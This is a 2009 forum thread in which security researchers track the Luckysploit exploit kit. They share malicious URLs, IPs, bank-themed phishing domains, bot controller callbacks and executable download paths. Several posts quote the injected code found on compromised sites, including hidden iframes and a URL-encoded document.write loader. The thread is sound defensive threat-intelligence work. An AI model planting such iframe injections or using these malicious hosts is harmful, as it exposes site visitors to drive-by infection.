Malware Domain List

Malware Related => Malicious Domains => Topic started by: phenom on February 12, 2009, 12:39:02 pm

Title: another Luckysploit IP
Post by: phenom on February 12, 2009, 12:39:02 pm
Code: [Select]
http://hello-to-you.net/rttz/?t=6
Its IP is 78.109.30.48, already in the MDL database, but does not yet list Luckysploit or the domain name.

Looks pretty similar to the fuck-lady version.

Wepawet link:
http://wepawet.iseclab.org/view.php?hash=c616a15254aa57bb0035ecce05633557&type=js (http://wepawet.iseclab.org/view.php?hash=c616a15254aa57bb0035ecce05633557&type=js)
Title: Re: another Luckysploit IP
Post by: SysAdMini on February 12, 2009, 01:46:53 pm
I have seen many Luckyploits urls in the last days, but they work only one time from the same ip.

Example:
Code: [Select]
http://85.17.189.183/opis2/?h=
Title: Re: another Luckysploit IP
Post by: SysAdMini on February 12, 2009, 03:36:59 pm
Another one
Code: [Select]
http://202.73.57.6/tomi
Title: Re: another Luckysploit IP
Post by: SysAdMini on February 14, 2009, 05:18:55 am
Code: [Select]
http://r-state.com/equi/http://wepawet.cs.ucsb.edu/view.php?hash=14a57e49e92bebd6116da5ebddef1418&t=1234542448&type=js
Title: Re: another Luckysploit IP
Post by: GmG on February 15, 2009, 07:13:55 pm
Code: [Select]
http://94.247.2.157/.lck/?t=3
http://dvlorg.net/parus/?t=25
http://rodexcom.org/parus/?t=5
http://superioradz.info/opis2/?t=2
http://superioradz.info/opis3/?t=2

http://92.62.100.66/bm/?t=5
http://92.62.100.66/wait/?t=5
http://directlink0.cn/bm/?t=15
http://directlink0.cn/wait/?t=15
http://directlink1.cn/bm/?t=15
http://directlink1.cn/wait/?t=15
http://directlink2.cn/bm/?t=15
http://directlink2.cn/wait/?t=15
http://directlink4.cn/bm/?t=15
http://directlink4.cn/wait/?t=15
http://directlink9.cn/bm/?t=15
http://directlink9.cn/wait/?t=15
http://trafffive.cn/bm/?t=15
http://trafffive.cn/wait/?t=15
Title: Re: another Luckysploit IP
Post by: SysAdMini on February 15, 2009, 09:47:42 pm
Thanks, GmG. Nice collection.
Title: Re: another Luckysploit IP
Post by: SysAdMini on February 18, 2009, 02:49:11 pm
Another url. Thanks to our new member Bang.

Code: [Select]
http://deinglaube.com/images/
redirects to Luckysploit url
Code: [Select]
http://statclick.net/main/?t=1
Title: Re: another Luckysploit IP
Post by: Micha on February 18, 2009, 03:28:30 pm
The other domains are also not very kosher:

http://www.trustedsource.org/query/ns1.globo-meds.com?m=ns

Code: [Select]
Domains on Nameserver ns1.globo-meds.com

statclick.net
sei-keine.com
globo-meds.com
google-analitic.com
deinglaube.com
verzeih.com
auf-jeder.com
chiburashko.com
xryndel.com

Already listed as bad since last year: http://www.malwaredomainlist.com/mdl.php?search=verzeih.com
Title: Re: another Luckysploit IP
Post by: SysAdMini on February 18, 2009, 06:50:34 pm
Code: [Select]
http://verzeih.com/state/?t=1
redirects to another Luckysploit

Code: [Select]
top.sei-keine.com/u-store/?t=1
Title: Re: another Luckysploit IP
Post by: SysAdMini on February 24, 2009, 06:10:13 pm
Code: [Select]
federalreserve.banknetworks.net/bb/?t=2http://wepawet.cs.ucsb.edu/view.php?hash=5f7cc23f4777d2d36527479fc1154557&t=1235499824&type=js
Title: Re: another Luckysploit IP
Post by: Micha on February 27, 2009, 09:11:31 am
Another example: (watch the hidden IFRAME to DummySploit)

Code: [Select]
hxxp://ustreasury.usbanknet.net
Code: [Select]
ns1.frb-network.com A 220.196.59.26
ns1.usbanknetwork.com A 220.196.59.26
ns1.fedwirenetworks.com A 220.196.59.26
ns1.e-banknetworks.com A 220.196.59.26
ns1.ebanknetworks.com A 220.196.59.26
ns1.usbanknetworks.com A 220.196.59.26
ns1.federalreservebanks.us A 220.196.59.26
ns1.fedwirenetworks.us A 220.196.59.26
ns1.e-banknetworks.us A 220.196.59.26
ns1.banknetworks.us A 220.196.59.26
ns1.ebanknetworks.us A 220.196.59.26
ns1.usbanknetworks.us A 220.196.59.26
ns1.banknets.us A 220.196.59.26
ns1.frb-network.net A 220.196.59.26
ns1.ebanknetwork.net A 220.196.59.26
ns1.usbanknetwork.net A 220.196.59.26
ns1.e-banknetworks.net A 220.196.59.26
ns1.banknetworks.net A 220.196.59.26
ns1.ebanknetworks.net A 220.196.59.26
ns1.usbanknetworks.net A 220.196.59.26
ns1.usbanknet.net A 220.196.59.26
ns1.dnscore.ru A 220.196.59.26
ns1.dnshoster.ru A 220.196.59.26
ns1.cheapdns.ru A 220.196.59.26
Title: Re: another Luckysploit IP
Post by: SysAdMini on February 28, 2009, 02:24:47 pm
Code: [Select]
85.17.189.183/clicksagent2http://wepawet.cs.ucsb.edu/view.php?hash=e7f5ef845f85b27352b3d890ea6bab9a&t=1235832015&type=js
Title: Re: another Luckysploit IP
Post by: SysAdMini on March 01, 2009, 02:21:28 pm
Code: [Select]
analytics.pl.ua/scripts/?t=4
Title: Re: another Luckysploit IP
Post by: SysAdMini on March 02, 2009, 02:10:49 pm
Code: [Select]
odile-marco.com/tomihttp://wepawet.cs.ucsb.edu/view.php?hash=104400c94a446e2cdb803341c189dc03&t=1236003897&type=js
Title: Re: another Luckysploit IP
Post by: GmG on March 06, 2009, 07:35:39 pm
Code: [Select]
http://idealadvertising.org/clicksagent2/?t=2
Title: Re: another Luckysploit IP
Post by: DiFor on March 07, 2009, 01:39:16 am
this lucky is example of http://www.malwaredomainlist.com/forums/index.php?topic=2577.msg7948#msg7948
Title: Re: another Luckysploit IP
Post by: SysAdMini on March 07, 2009, 07:55:14 pm
Code: [Select]
bigmyfuck.com/prn/index.php?t=4
Code: [Select]
hello-to-you.net/love/?t=2
Title: Re: another Luckysploit IP
Post by: GmG on March 08, 2009, 07:17:25 pm
Code: [Select]
http://193.138.172.15/salo/?t=3
http://193.138.172.15/mark/
Title: Re: another Luckysploit IP
Post by: SysAdMini on March 10, 2009, 12:37:48 pm
Code: [Select]
clickcouner.cn
v-security.info/alla
Title: Re: another Luckysploit IP
Post by: SysAdMini on March 12, 2009, 11:17:51 am
Code: [Select]
stats-analytics.cn/lera/
Title: Re: another Luckysploit IP
Post by: SysAdMini on March 12, 2009, 07:06:56 pm
Code: [Select]
splo2day.com/lera/?t=6
Title: Re: another Luckysploit IP
Post by: SysAdMini on March 13, 2009, 11:29:31 pm
Code: [Select]
84.244.138.55/ase/?t=4
Title: Re: another Luckysploit IP
Post by: SysAdMini on March 15, 2009, 07:00:16 pm
Code: [Select]
bestlotron.cn/in.cgi?cocacola
kotleto.com/main/?t=1
Title: Re: another Luckysploit IP
Post by: SysAdMini on March 16, 2009, 03:02:47 pm
Code: [Select]
78.41.207.196/vertu/?t=5
Title: Re: another Luckysploit IP
Post by: SysAdMini on March 17, 2009, 04:37:35 pm
Code: [Select]
78.41.207.196/vertu/?t=5

Today I found the way of infection.

Compromised sites like
Code: [Select]
www.my-harmony.org
contain IFrames
Code: [Select]
body><iframe src="hxxp://perfectnamestore.cn/in.cgi?income4" width=1 height=1 style="visibility: hidden"></iframe><iframe src="hxxp://namebuyline.cn/in.cgi?income2" width=1 height=1 style="visibility: hidden"></iframe>
<

to
Code: [Select]
hxxp://perfectnamestore.cn/in.cgi?income4
hxxp://namebuyline.cn/in.cgi?income2

which redirect to the Luckysploit url.
Title: Re: another Luckysploit IP
Post by: SysAdMini on March 18, 2009, 03:57:34 pm
Code: [Select]
r-security.info/alla
Title: Re: another Luckysploit IP
Post by: GmG on March 18, 2009, 05:00:21 pm
Code: [Select]
r-security.info/alla

and

Code: [Select]
http://l-security.info/alla
http://p-security.info/alla

 ;)
Title: Re: another Luckysploit IP
Post by: GmG on March 18, 2009, 07:21:55 pm
Code: [Select]
http://72.233.79.18/tyrek/?t=2
http://wepawet.iseclab.org/view.php?hash=08708c81fd98614d7ffa6d03578c2842&t=1237404046&type=js
Title: Re: another Luckysploit IP
Post by: SysAdMini on March 24, 2009, 07:23:49 am
Code: [Select]
58.65.237.2/?t=1
Title: Re: another Luckysploit IP
Post by: SysAdMini on March 24, 2009, 06:03:14 pm
Code: [Select]
niencos3432d.cn/bb/?t=7http://wepawet.cs.ucsb.edu/view.php?hash=57ad9efedc55e1516ad177868892e886&t=1237918022&type=js
Title: Re: another Luckysploit IP
Post by: SysAdMini on March 25, 2009, 08:19:45 pm
Code: [Select]
news-week.biz/samuraj/
services.rv.ua/scripts/
cheesee.uz.ua/scripts/
updsearch.if.ua/scripts/
core.uz.ua/scripts/
asd8.uz.ua/scripts/
host4you.rv.ua/scripts/
adodb.vn.ua/scripts/
jogo.if.ua/scripts/
Title: Re: another Luckysploit IP
Post by: SysAdMini on March 26, 2009, 11:25:00 am
Code: [Select]
google-stat.com/tomi/?t=2
Title: Re: another Luckysploit IP
Post by: GmG on March 26, 2009, 05:51:26 pm
Code: [Select]
http://alibaster-lab.com/ku4ka/?t=1
Title: Re: another Luckysploit IP
Post by: GmG on March 28, 2009, 03:34:48 pm
Code: [Select]
http://kingf0x.net/clicksagent2/?t=2
Title: Re: another Luckysploit IP
Post by: SysAdMini on March 28, 2009, 05:41:12 pm
Code: [Select]
myfucking-pussy.com/tyrek/
Title: Re: another Luckysploit IP
Post by: GmG on April 04, 2009, 05:52:51 pm
Code: [Select]
http://0direct.com/imga/?t=2
http://that0world.com/imga/?t=4
http://goneseanatural.com/imga/?t=4
http://meetyourlove.ws/imga/?t=4
Title: Re: another Luckysploit IP
Post by: SysAdMini on April 06, 2009, 05:30:53 pm
Code: [Select]
buidnote.com/nates/?h
See also :

http://www.malwaredomainlist.com/forums/index.php?topic=2640.msg8607#msg8607
Title: Re: another Luckysploit IP
Post by: carmen on April 10, 2009, 03:29:57 pm
I found more information on luckysploit :D

http://mipistus.blogspot.com/2009/02/luckysploit-la-mano-derecha-de-zeus.html
http://evilfingers.blogspot.com/2009/02/luckysploit-right-hand-of-zeus.html

Good post. Bye
Title: Re: another Luckysploit IP
Post by: Malware-Web-Threats on April 13, 2009, 07:46:40 am
67.18.222.2

Code: [Select]
hxxp://whitecitylights.com
which leads to a new domain on 85.17.189.183

Code: [Select]
hxxp://firstplumb.info/clicksagent/?t=1
Redirection Analysis: Wepawet (http://wepawet.iseclab.org/view.php?hash=1824b9bf14bce00a89f9bb0efc1ccbda&t=1239583980&type=js)
Title: Re: another Luckysploit IP
Post by: michajp on April 14, 2009, 04:07:34 am
Here another one which was found in upper folder of a phishing site:

Code: [Select]
hxxp://fzfaw6.davtraff.com/tomi/?t=2
micha
Title: Re: another Luckysploit IP
Post by: michajp on April 14, 2009, 09:25:28 am
Hello,

Code: [Select]
hxxp://odmarco.com/tomi/?t=2
micha
Title: Re: another Luckysploit IP
Post by: michajp on April 14, 2009, 09:34:02 am
Ugh, please ignore former one, it's already in the list.

Cheers
Title: Re: another Luckysploit IP
Post by: SysAdMini on April 14, 2009, 09:36:49 am
Ugh, please ignore former one, it's already in the list.

Cheers

No, it wasn't in the list. Just added.  :)
Title: Re: another Luckysploit IP
Post by: Malware-Web-Threats on April 15, 2009, 02:36:35 pm
New IP: 88.241.202.224 - Redirect to LuckySploit

Code: [Select]
hxxp://jafarcompany.biz

in relation with 85.17.189.183 (already in list)

Code: [Select]
hxxp://firstplumb.info/clicksagent/?t=9
hxxp://85.17.189.183/clicksagent/?h=17h

Wepawet Analysis (http://wepawet.cs.ucsb.edu/view.php?hash=36a7465d63cd70ad7b3bdeb4bf1cf928&t=1239806083&type=js)
Title: Re: another Luckysploit IP
Post by: SysAdMini on April 25, 2009, 09:41:34 am
Code: [Select]
fiolao.cn/lyre/?http://wepawet.cs.ucsb.edu/view.php?hash=02e8922e6049bc285474a38ed3b81f9d&t=1240652702&type=js
Title: Re: another Luckysploit IP
Post by: Malware-Web-Threats on April 27, 2009, 09:53:43 pm
Code: [Select]
hxxp://firstplumb.info/clicksagent2/?t=1&

wepawet fails to analyze this one (URL 404 not found)

Use jsunpack (http://jsunpack.jeek.org/dec/go)
Title: Re: another Luckysploit IP
Post by: mercutio on April 28, 2009, 07:26:51 am
Reanalyzed from a different IP (for a change, we also get a binary):
http://wepawet.cs.ucsb.edu/view.php?hash=030fdf6bcc7d2b81759f0f3f041ff929&t=1240903600&type=js

Title: Re: another Luckysploit IP
Post by: michajp on April 28, 2009, 05:23:14 pm
Hello,

Code: [Select]
hxxp://usbanks.server-17.us/bb/?t=2

Micha
Title: Re: another Luckysploit IP
Post by: michajp on April 28, 2009, 05:55:07 pm
Code: [Select]
hxxp://federalreservebanks.safe-connect.us/bb/?t=2
Title: Re: another Luckysploit IP
Post by: CM_MWR on April 28, 2009, 06:25:02 pm
Code: [Select]
habrion.cn/in.cgi?3
habrion.cn/lyre/?t=2
habrion.cn/lyre/?1e1b04c40e61519d5f1462487914be7059bd5a76bd82fe3b598493fb47cd15011b6453cb8a25bbdd661b700805daafcbec370ca20fd35c99ebb4108a12c8d698
habrion.cn/lyre/?2922ad60ed42eb2f5e186870d8fe8ad6c84d24f9c29f5b476afe4967aa8cea27b2868035c23438aaa85d50310cc57e29a585c5c640e1eb0a7da917dd386e5933
habrion.cn/lyre/?66b3c685ec9fe6507351e9a007c7bdda110ddcbbdaffb702a8c47d83e10c7d057aa7c205170759158cfeef2b3e54dc307adb46a597277a03021daecb669f430b
habrion.cn/lyre/?52a9b7d8013738a1245946bc142735dbc32d658fb34ae643951c282ae406692c7c06bfd76500242a137b2af34722e1ffd5fb3bbec9673dfba590ab9951d2c9ed
habrion.cn/lyre/?h=5a.0gi?892bd46e0100f07002da639a9a060000000002c15031930001040900000000170
bgbtorlopos.com/kitm5/gate.php?id=33c9961a
bgbtorlopos.com/bbv/juyjyuj5.exe
habrion.cn/bm_a/controller.php?action=bot&entity_list=&uid=2&first=1&guid=4108621338&rnd=123
habrion.cn/bm_a/controller.php?action=report&guid=0&rnd=123&uid=2&entity=1240225592:unique_start
habrion.cn/bm_a/controller.php?action=bot&entity_list=1240225592&uid=2&first=0&guid=4108621338&rnd=123
habrion.cn/bm_a/controller.php?action=report&guid=0&rnd=123&uid=2&entity=
bgbtorlopos.com/kitm5/gate.php?id=f4e4961a
aboutmmgftf.com/kitiktk5//data.php?phid=EA05C159D159C148C047BE36AD259D15&lg=ENU&user=DAMIT
aboutmmgftf.com/kitiktk5//info.php?ver=0.01&phid=EA05C159D159C148C047BE36AD259D15&lg=ENU
Title: Re: another Luckysploit IP
Post by: michajp on April 29, 2009, 06:07:19 am
Code: [Select]
hxxp://usbanks.ebanks-net.us/34733/CM/wire/issue-127932/bb/?t=2
hxxp://usabanks.secureserver-32.us/31107/CM/wire/issue-127431/bb/?t=2
hxxp://federalreservebanks.central-security.us/32394/CM/wire/issue-127835/bb/?t=2
hxxp://federalreserve.secureserver-37.us/37594/CM/wire/issue-127231/bb/?t=2
hxxp://usbanks.1-secure.us/34846/CM/wire/issue-127333/bb/?t=2
Title: Re: another Luckysploit IP
Post by: michajp on April 29, 2009, 12:11:50 pm
Code: [Select]
hxxp://federalreservebank.1-bank.us/30802/CM/wire/issue-127632/bb/?t=2
Title: Re: another Luckysploit IP
Post by: Mr Clean on April 29, 2009, 12:43:05 pm
Code: [Select]
hxxp://federalreservebank.1-bank.us/30802/CM/wire/issue-127632/bb/?t=2

anyone care to go fishing?

http://www.bfk.de/bfk_dnslogger.html?query=221.5.74.42#result

Code: [Select]
ns1.secureserver-1.us A 221.5.74.42
ns2.secureserver-1.us A 221.5.74.42
federalreservebanks.secureserver-1.us A 221.5.74.42
frbanks.secureserver-1.us A 221.5.74.42
usbanks.secureserver-1.us A 221.5.74.42
ustreasury.secureserver-1.us A 221.5.74.42
ns1.securenet-1.us A 221.5.74.42
ns2.securenet-1.us A 221.5.74.42
federalreserve.securenet-1.us A 221.5.74.42
ns1.secure-server1.us A 221.5.74.42
ns2.secure-server1.us A 221.5.74.42
federalreserve.secure-server1.us A 221.5.74.42
mail.secure-server1.us A 221.5.74.42
usabanks.secure-server1.us A 221.5.74.42
federalreservebanks.secure-server1.us A 221.5.74.42
frbanks.secure-server1.us A 221.5.74.42
usbanks.secure-server1.us A 221.5.74.42
treasurydept.secure-server1.us A 221.5.74.42
www.secure-server1.us A 221.5.74.42
ustreasury.secure-server1.us A 221.5.74.42
ns1.server-22.us A 221.5.74.42
ns2.server-22.us A 221.5.74.42
federalreservebank.server-22.us A 221.5.74.42
federalreservebanks.server-22.us A 221.5.74.42
frbanks.server-22.us A 221.5.74.42
usbanks.server-22.us A 221.5.74.42
treasurydept.server-22.us A 221.5.74.42
ustreasury.server-22.us A 221.5.74.42
ns1.secureserver-32.us A 221.5.74.42
ns2.secureserver-32.us A 221.5.74.42
federalreservebank.secureserver-32.us A 221.5.74.42
mail.secureserver-32.us A 221.5.74.42
federalreservebanks.secureserver-32.us A 221.5.74.42
www.secureserver-32.us A 221.5.74.42
ustreasury.secureserver-32.us A 221.5.74.42
ns1.server-23.us A 221.5.74.42
ns2.server-23.us A 221.5.74.42
federalreserve.server-23.us A 221.5.74.42
federalreservebank.server-23.us A 221.5.74.42
federalreservebanks.server-23.us A 221.5.74.42
frbanks.server-23.us A 221.5.74.42
usbanks.server-23.us A 221.5.74.42
treasurydept.server-23.us A 221.5.74.42
ustreasury.server-23.us A 221.5.74.42
ns1.secureserver-23.us A 221.5.74.42
ns2.secureserver-23.us A 221.5.74.42
federalreservebanks.secureserver-23.us A 221.5.74.42
ns1.secureserver-33.us A 221.5.74.42
ns2.secureserver-33.us A 221.5.74.42
ns1.secureserver-4.us A 221.5.74.42
ns2.secureserver-4.us A 221.5.74.42
federalreserve.secureserver-4.us A 221.5.74.42
mail.secureserver-4.us A 221.5.74.42
usabanks.secureserver-4.us A 221.5.74.42
federalreservebanks.secureserver-4.us A 221.5.74.42
usbanks.secureserver-4.us A 221.5.74.42
www.secureserver-4.us A 221.5.74.42
ns1.secureserver-34.us A 221.5.74.42
ns2.secureserver-34.us A 221.5.74.42
federalreservebank.secureserver-34.us A 221.5.74.42
ns1.secureserver-44.us A 221.5.74.42
ns2.secureserver-44.us A 221.5.74.42
frbanks.secureserver-44.us A 221.5.74.42
ns1.secureserver-55.us A 221.5.74.42
ns2.secureserver-55.us A 221.5.74.42
mail.secureserver-55.us A 221.5.74.42
fedbanks.secureserver-55.us A 221.5.74.42
usbanks.secureserver-55.us A 221.5.74.42
www.secureserver-55.us A 221.5.74.42
ns1.secureserver-6.us A 221.5.74.42
ns2.secureserver-6.us A 221.5.74.42
frbanks.secureserver-6.us A 221.5.74.42
ns1.server-17.us A 221.5.74.42
ns2.server-17.us A 221.5.74.42
federalreserve.server-17.us A 221.5.74.42
federalreservebank.server-17.us A 221.5.74.42
treasurydept.server-17.us A 221.5.74.42
ns1.secureserver-27.us A 221.5.74.42
ns2.secureserver-27.us A 221.5.74.42
federalreserve.secureserver-27.us A 221.5.74.42
fedbanks.secureserver-27.us A 221.5.74.42
federalreservebanks.secureserver-27.us A 221.5.74.42
frbanks.secureserver-27.us A 221.5.74.42
ns1.secureserver-37.us A 221.5.74.42
ns2.secureserver-37.us A 221.5.74.42
federalreserve.secureserver-37.us A 221.5.74.42
ns1.server-18.us A 221.5.74.42
ns2.server-18.us A 221.5.74.42
treasurydept.server-18.us A 221.5.74.42
ns1.secureserver-28.us A 221.5.74.42
ns2.secureserver-28.us A 221.5.74.42
federalreserve.secureserver-28.us A 221.5.74.42
mail.secureserver-28.us A 221.5.74.42
frbanks.secureserver-28.us A 221.5.74.42
treasurydept.secureserver-28.us A 221.5.74.42
www.secureserver-28.us A 221.5.74.42
ns1.server-19.us A 221.5.74.42
ns2.server-19.us A 221.5.74.42
federalreservebank.server-19.us A 221.5.74.42
fedbanks.server-19.us A 221.5.74.42
federalreservebanks.server-19.us A 221.5.74.42
ustreasury.server-19.us A 221.5.74.42
ns1.secureserver-39.us A 221.5.74.42
ns2.secureserver-39.us A 221.5.74.42
usabanks.secureserver-39.us A 221.5.74.42
federalreservebanks.secureserver-39.us A 221.5.74.42
usbanks.secureserver-39.us A 221.5.74.42
treasurydept.secureserver-39.us A 221.5.74.42
ns1.1-secure.us A 221.5.74.42
ns2.1-secure.us A 221.5.74.42
federalreserve.1-secure.us A 221.5.74.42
usabanks.1-secure.us A 221.5.74.42
treasurydept.1-secure.us A 221.5.74.42
ustreasury.1-secure.us A 221.5.74.42
ns1.1-bank.us A 221.5.74.42
ns2.1-bank.us A 221.5.74.42
mail.1-bank.us A 221.5.74.42
usabanks.1-bank.us A 221.5.74.42
fedbanks.1-bank.us A 221.5.74.42
federalreservebanks.1-bank.us A 221.5.74.42
frbanks.1-bank.us A 221.5.74.42
treasurydept.1-bank.us A 221.5.74.42
www.1-bank.us A 221.5.74.42
ustreasury.1-bank.us A 221.5.74.42
ns1.direct-ebank.us A 221.5.74.42
ns2.direct-ebank.us A 221.5.74.42
federalreservebank.direct-ebank.us A 221.5.74.42
usbanks.direct-ebank.us A 221.5.74.42
treasurydept.direct-ebank.us A 221.5.74.42
ns1.e-banks.us A 221.5.74.42
ns2.e-banks.us A 221.5.74.42
usabanks.e-banks.us A 221.5.74.42
fedbanks.e-banks.us A 221.5.74.42
ns1.safe-connect.us A 221.5.74.42
ns2.safe-connect.us A 221.5.74.42
federalreserve.safe-connect.us A 221.5.74.42
federalreservebanks.safe-connect.us A 221.5.74.42
usbanks.safe-connect.us A 221.5.74.42
ustreasury.safe-connect.us A 221.5.74.42
ns1.e-directconnect.us A 221.5.74.42
ns2.e-directconnect.us A 221.5.74.42
federalreserve.e-directconnect.us A 221.5.74.42
federalreservebank.e-directconnect.us A 221.5.74.42
usabanks.e-directconnect.us A 221.5.74.42
fedbanks.e-directconnect.us A 221.5.74.42
federalreservebanks.e-directconnect.us A 221.5.74.42
ustreasury.e-directconnect.us A 221.5.74.42
ns1.banks-net.us A 221.5.74.42
ns2.banks-net.us A 221.5.74.42
federalreservebank.banks-net.us A 221.5.74.42
mail.banks-net.us A 221.5.74.42
federalreservebanks.banks-net.us A 221.5.74.42
www.banks-net.us A 221.5.74.42
ustreasury.banks-net.us A 221.5.74.42
ns1.ebanks-net.us A 221.5.74.42
ns2.ebanks-net.us A 221.5.74.42
federalreserve.ebanks-net.us A 221.5.74.42
fedbanks.ebanks-net.us A 221.5.74.42
usbanks.ebanks-net.us A 221.5.74.42
treasurydept.ebanks-net.us A 221.5.74.42
ns1.1-security.us A 221.5.74.42
ns2.1-security.us A 221.5.74.42
usabanks.1-security.us A 221.5.74.42
fedbanks.1-security.us A 221.5.74.42
federalreservebanks.1-security.us A 221.5.74.42
frbanks.1-security.us A 221.5.74.42
ns1.central-security.us A 221.5.74.42
ns2.central-security.us A 221.5.74.42
federalreserve.central-security.us A 221.5.74.42
fedbanks.central-security.us A 221.5.74.42
federalreservebanks.central-security.us A 221.5.74.42
frbanks.central-security.us A 221.5.74.42
ustreasury.central-security.us A 221.5.74.42
Title: Re: another Luckysploit IP
Post by: RS-232 on April 29, 2009, 12:57:14 pm
Just a quick note...exactly two ips earlier -> proxim.ircgalaxy.pl  ;)
http://www.bfk.de/bfk_dnslogger.html?query=221.5.74.40#result
Title: Re: another Luckysploit IP
Post by: Malware-Web-Threats on May 03, 2009, 04:31:54 pm
redirects to luckysploit on 85.17.189.183
Code: [Select]
hxxp://antivirus.vc
Wepawet (http://wepawet.cs.ucsb.edu/view.php?type=js&hash=7182041b19860941fe33e334ea7031f8&t=1238594164)

with this

Quote
if (!myia){
  document.write(unescape('
%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%32%36%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%61
%6e%74%69%76%69%72%75%73%2e%76%63%2f%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68
%2e%72%61%6e%64%6f%6d%28%29%2a%32%32%31%39%32%30%29%2b%27%38%39%61%61%35%34%66%66%35%27%20
%77%69%64%74%68%3d%37%33%30%20%68%65%69%67%68%74%3d%33%30%34%20%73%74%79%6c%65%3d%27%76%69
%73%69%62%69%6c%69%74%79%3a%68%69%64%64%65%6e%27%3e%3c%2f%69%66%72%61%6d%65%3e'));
}
var myia = true;

Quote
<iframe name=c26 src='hxxp://antivirus.vc/?'+Math.round(Math.random()*221920)+'89aa54ff5' width=730 height=304 style='visibility:hidden'></iframe>
Title: Re: another Luckysploit IP
Post by: Malware-Web-Threats on May 05, 2009, 03:16:22 pm
209.44.100.58
Code: [Select]
hxxp://odegda.cv.ua/in.cgi?2&
hxxp://totalmic.if.ua/sx/?t=2

the exploit: Wepawet (http://wepawet.iseclab.org/view.php?hash=ad3cbb847c3ccbdeb7027147ec7d820f&type=js)
Title: Re: another Luckysploit IP
Post by: michajp on May 12, 2009, 03:18:55 pm
Code: [Select]
hxxp://ustreasury.federalbanksystem.net/31689/FRB/phishing/Issue~73841/
hxxp://ustreasury.federalbanks.us/33704/FRB/phishing/Issue~73624/
hxxp://usbanks.esecure-federal.us/38297/FRB/phishing/Issue~73818/
hxxp://federalreserve-online.com/31419/FRB/phishing/Issue~73574/
hxxp://federalreserve-online.com/37692/FRB/phishing/Issue~73680/
hxxp://federalreserve-online.us/34673/FRB/phishing/Issue~73208/
hxxp://ustreasury.federalbanks.us/36476/FRB/phishing/Issue~73412/
hxxp://ustreasury.federalbanksystem.us/35242/FRB/phishing/Issue~73040/
hxxp://federalreserve-direct.com/32347/FRB/phishing/Issue~73659/
Title: Re: another Luckysploit IP
Post by: MysteryFCM on May 12, 2009, 05:48:06 pm
Related to the federal crap;

http://hosts-file.net/pest.asp?show=221.5.74.
Title: Re: another Luckysploit IP
Post by: CkreM on May 15, 2009, 06:10:46 am
60.29.232.31
(theres 1 listed luckysploit on that IP)

Code: [Select]
sgariiista.com/bb/?t=3http://wepawet.iseclab.org/view.php?hash=ec4a50b766fdb421f468da5be992490b&t=1242367679&type=js

Code: [Select]
Bolelshiko.com/bb/?t=3
Iiikaolllxxx.net/bb/?t=3
Sdfiiixkoas.net/bb/?t=3
Title: Re: another Luckysploit IP
Post by: Malware-Web-Threats on May 18, 2009, 09:21:34 pm
Several websites are pointing to the domain below with an IFRAME
Quote
<iframe src='hxxp://www.fujifork.co.jp/' width=1 height=1 style='visibility: hidden'></iframe>
<iframe src='hxxp://82.103.131.211/maco/?6e662d941e448da7c36e018acb86120b' width=1 height=1 style=
'visibility: hidden'></iframe>

compromised website used to spread LuckySploit:
Code: [Select]
hxxp://fujifork.co.jp
Wepawet (http://wepawet.iseclab.org/view.php?hash=e3deb27ca41f263d3d5611db29e98b9a&t=1242681390&type=js)

The IP hosting the LuckySploit:
Code: [Select]
hxxp://82.103.131.211/maco/?6e662d941e448da7c36e018acb86120b
Wepawet link (http://wepawet.iseclab.org/view.php?hash=21720cc210eb0a166509839930236859&t=1242681445&type=js) (404 not found)
Jsunpack (http://jsunpack.jeek.org/dec/go?url=82.103.131.211_maco__6e662d941e448da7c36e018acb86120b)
Title: Re: another Luckysploit IP
Post by: michajp on May 26, 2009, 02:36:55 am
Code: [Select]
hxxp://italycruiseegypt.com/s/in.cgi?3 
redir to:
hxxp://mainssrv.com/maco/?24ed4e573fdb875bf41973b1e40e2dc1

http://www.virustotal.com/analisis/667d08f74147c71f914b09fe4f6fe559078819e23eb0e8280e9580e07c89de99-1243305061 (http://www.virustotal.com/analisis/667d08f74147c71f914b09fe4f6fe559078819e23eb0e8280e9580e07c89de99-1243305061)
Title: Re: another Luckysploit IP
Post by: michajp on June 05, 2009, 08:48:24 am
Code: [Select]
hxxp://myfucking-pussy.com/tyrek/?t=4
Title: Re: another Luckysploit IP
Post by: Malware-Web-Threats on June 11, 2009, 06:35:39 am

Code: [Select]
hxxp://originalsp.net/maoi/?bcba60e313aac523133482c9fe977c87
Wepawet (http://wepawet.iseclab.org/view.php?hash=ba7be5413ac16dab6608f2373a32b615&t=1244400008&type=js)
Title: Re: another Luckysploit IP
Post by: michajp on June 11, 2009, 12:50:57 pm
Code: [Select]
hxxp://213.155.29.101/vsetakoe/?5bd6b116bfc711362f0779381b812ff4
Title: Re: another Luckysploit IP
Post by: michajp on June 13, 2009, 11:24:37 am
Code: [Select]
hxxp://194.165.4.25/.luc/?f3d3b53b0ce86d0e3c8a48b36f12d42c/
Title: Re: another Luckysploit IP
Post by: SysAdMini on July 24, 2009, 11:25:29 am
redirects to Luckysploit
Code: [Select]
calid.org/pro/in.cgi?2
Luckysploit
Code: [Select]
folemio.info/vsetakoe/?036e47146bcc7ea276d378224402fef7
Title: Re: another Luckysploit IP
Post by: michajp on August 09, 2009, 08:46:33 am
Redirects to Luckysploit:
Code: [Select]
hxxp://mywebdesignonline.co.uk/SUD/
#Note: As you know, the Luckysploit code is usually only pushed once per IP. Above URL contains more nastyness on reload after the first push of the Luckysploit.

Luckysploit:
Code: [Select]
hxxp://122.70.145.157/.cua/?64bbea3228fa200efa17528148f6dddf
Title: Re: another Luckysploit IP
Post by: MysteryFCM on August 09, 2009, 08:54:45 am
Interesting open dir at mywebdesignonline.co.uk too ;)

/edit

Code: [Select]
mywebdesignonline.co.uk/
mywebdesignonline.co.uk/?D=A
mywebdesignonline.co.uk/?M=A
mywebdesignonline.co.uk/?N=D
mywebdesignonline.co.uk/?S=A
mywebdesignonline.co.uk/_private/
mywebdesignonline.co.uk/_vti_bin/
mywebdesignonline.co.uk/_vti_cnf/
mywebdesignonline.co.uk/_vti_inf.html
mywebdesignonline.co.uk/_vti_log/
mywebdesignonline.co.uk/_vti_pvt/
mywebdesignonline.co.uk/_vti_txt/
mywebdesignonline.co.uk/1.html
mywebdesignonline.co.uk/1fitb9n/
mywebdesignonline.co.uk/35pj6wm/
mywebdesignonline.co.uk/4b167pk/
mywebdesignonline.co.uk/4r71dro/
mywebdesignonline.co.uk/6gi5gt/
mywebdesignonline.co.uk/71x8t0/
mywebdesignonline.co.uk/archive/
